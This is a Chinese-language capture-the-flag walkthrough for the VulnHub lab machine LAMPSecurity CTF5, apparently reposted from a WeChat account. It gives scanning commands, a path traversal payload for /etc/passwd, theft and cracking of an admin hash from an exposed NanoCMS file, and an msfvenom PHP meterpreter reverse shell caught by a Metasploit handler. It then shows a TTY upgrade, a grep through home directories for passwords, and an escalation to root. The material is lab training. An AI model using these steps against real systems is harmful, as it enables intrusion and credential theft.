本次使用靶机名为LAMPSECURITY: CTF4的ctf挑战。我们的目标是获取该靶机root shell
下载链接:https://www.vulnhub.com/entry/lampsecurity-ctf5,84/
网络扫描
老规矩 首先要获取目标IP进行确定
netdiscover -i eth0 -r 192.168.0.0/24
该靶机IP地址-> 192.168.0.101
运行NMAP进行扫描
nmap -sV -sC -p- -oN /CTF/vulnhub/ctf5/nmap 192.168.0.101
nmap扫描显示该靶机开放大量的端口。我们首先从80(http)开始
浏览URL http://192.168.0.1/
看到该网站有很多选项可以进一步导航。
网络服务扫描
运行Nikto工具获取更多信息
nikto -h 192.168.0.101
在回显中我们可以看到nikto给我们列举了很多该机器容易出现的漏洞
比如LRL/RFL漏洞 现在我们从这里入手
http://192.168.0.101/index.php?page=../../../../../../../../../etc/passwd%00
接下来我们点击blog页面,他会将我们重定向到URL http://192.168.0.101/~andy/
在这里我们注意到一个很关键的点,该网站是由nanoCMS提供支持,因此我们搜索了关于NanoCMS相关的漏洞
NanoCMS是一个基于PHP的轻量级CMS,现已停产。在上图我们也可以看到它容易出现信息泄露漏洞,因为它无法验证对敏感文件的访问 “/data/pagesdat.txt”.
那么现在我们尝试在http://192.168.0.101/~andy/后添加 /data/pagesdata.txt 进行访问。
在此文件中包含管理员的用户名和密码哈希值
接下来进行MD5解密
https://crackstation.net/
那么现在我们获取到“shannon”为管理员“admin”用户的密码
现在点击导航页blog左下角的登录按钮,尝试登录
登录到管理面板后可以看到很多功能按钮 注意到“New Page”在这里我们可以尝试添加新内容
生成PHP后门
使用msfvenom命令生成一个反向PHP shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.134 lport=4444 -f raw
现在将以上代码进行复制
粘贴到Content位置。然后单机添加页面。
在blog导航页我们可以看到php shell已经上传成功。
反向连接
现在我们打开metasploit控制台并执行以下操作
use exploit/multi/handlerset payload php/meterpreter/reverse_tcpset lhost 192.168.0.104set lport 4444run
在运行后点击当问我们上传的shell。这样我们就会得到一个meterpreter控制台,
为了访问正确的TTY shell 我们在中终端运行以下操作
shellpython -c 'import pty; pty.spawn("/bin/bash")'
因为/home/目录是可读的
Linux本地枚举
我们尝试搜索字符串 passowrd
grep -R -i password /home/*
在这里我们找到我感兴趣的东西,存在root password
下面我们查看此文件
cat 481bca0d-7206-45dd-a459-a72ea1131329.note
呕吼 真的是一个很大的惊喜。
获得root权限
su - #切换到root用户
现在我们就得到了root访问权限。
在本机器中 存在多种方式可以获得root权限,大家可以尝试尝试哦。
点击下方公众号获取更多内容
原文始发于微信公众号(剑客江湖):vulnhub-LAMPSecurity:CTF 5
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论